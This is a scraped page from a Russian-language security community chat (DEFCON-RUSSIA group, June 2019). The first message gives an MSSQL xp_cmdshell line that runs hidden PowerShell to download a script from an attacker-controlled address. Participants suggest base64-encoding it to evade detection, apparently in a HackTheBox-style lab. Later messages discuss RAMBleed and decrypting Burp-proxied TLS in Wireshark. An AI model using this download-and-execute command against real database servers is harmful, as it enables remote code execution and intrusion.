В рейтинге участвует:

групп:

каналов:

Виртуальный сервер на SSD - недорого!

Аренда выделенных и виртуальных серверов (VDS/VPS), хостинг, аренда IP-адресов, администрирование, круглосуточная поддержка

qwarta.ru подробнее

Резервное копирование с проверкой на вирусы!!!

Удобный сервис создания резервных копий на любой сервер сети интернет. Отслеживайте изменения, проверяйте на вирусы. Надежно защитите свой бизнес!

go.backupland.com

Выбираете сервер? Любая конфигурация на заказ!

Аренда физических серверов любых конфигураций под любые запросы - 1С бухгалтерия, игровые сервера, нагруженные проекты, интернет-магазины!

qwarta.ru подробнее

Size: a a a

DCG#7812 DEFCON-RUSSIA

839 membersпожаловаться на группу
2019 June 10

D

Danila in DCG#7812 DEFCON-RUSSIA
exec xp_cmdshell "powershell -noprofile -w hidden -c 'iex ((new-object net.WebClient).DownloadFile("http://10.10.14.106:8000/in.ps1"))'";
источник
20:58пожаловаться#1

D

Danila in DCG#7812 DEFCON-RUSSIA
alxchk
-enc
Ja ja,+ b64 encode
источник
20:59пожаловаться#2

a

alxchk in DCG#7812 DEFCON-RUSSIA
powershell создан специально для малвары
источник
20:59пожаловаться#3

D

Danila in DCG#7812 DEFCON-RUSSIA
alxchk
powershell создан специально для малвары
По подвальным проектам анб
источник
20:59пожаловаться#4

a

alxchk in DCG#7812 DEFCON-RUSSIA
а xp_cmdshell еще в реальной жизни бывает?
источник
21:03пожаловаться#5

PI

PaHUEllo IbanuZZo in DCG#7812 DEFCON-RUSSIA
alxchk
а xp_cmdshell еще в реальной жизни бывает?
д
источник
21:03пожаловаться#6

PI

PaHUEllo IbanuZZo in DCG#7812 DEFCON-RUSSIA
судя по айпишнику, это хтб)
источник
21:04пожаловаться#7

PI

PaHUEllo IbanuZZo in DCG#7812 DEFCON-RUSSIA
заверни в б64
источник
21:05пожаловаться#8

D

Danila in DCG#7812 DEFCON-RUSSIA
alxchk
а xp_cmdshell еще в реальной жизни бывает?
Д
источник
21:12пожаловаться#9

D

Danila in DCG#7812 DEFCON-RUSSIA
В банках бывает все)
источник
21:13пожаловаться#10
2019 June 12

S

Slava in DCG#7812 DEFCON-RUSSIA
http://rambleed.com
источник
14:01пожаловаться#11

GD

Green Dog in DCG#7812 DEFCON-RUSSIA
Slava
http://rambleed.com
ого
источник
14:07пожаловаться#12

A

Anatol in DCG#7812 DEFCON-RUSSIA
Green Dog
ого
ага
источник
14:10пожаловаться#13

e

e13fter in DCG#7812 DEFCON-RUSSIA
всем привет! когда проксируешь HTTPS через burp, как-нибудь можно получить сессионный ключ TLS, чтоб скормить его уже в wireshark?
источник
22:21пожаловаться#14

R

Rustam in DCG#7812 DEFCON-RUSSIA
а приватный ключ берпа в wireshark не импортнуть?
источник
23:38пожаловаться#15

e

e13fter in DCG#7812 DEFCON-RUSSIA
а где его взять?
источник
23:52пожаловаться#16
2019 June 13

K

Konstantin in DCG#7812 DEFCON-RUSSIA
Сгенерировать selfsigned сертификат через openssl, а затем скормить его берпу, а ключ от него,соответственно шарку. Но тут есть нюанс: В берпе надо будет отключить в настройках ssl все edhe-шифры (т.к. в них шифрование ведётся на основе diffie-hellman)
источник
00:02пожаловаться#17

e

e13fter in DCG#7812 DEFCON-RUSSIA
Спасибо!
источник
00:10пожаловаться#18

e

e13fter in DCG#7812 DEFCON-RUSSIA
Попробую
источник
00:13пожаловаться#19

S

Sergio in DCG#7812 DEFCON-RUSSIA
👍
источник
10:24пожаловаться#20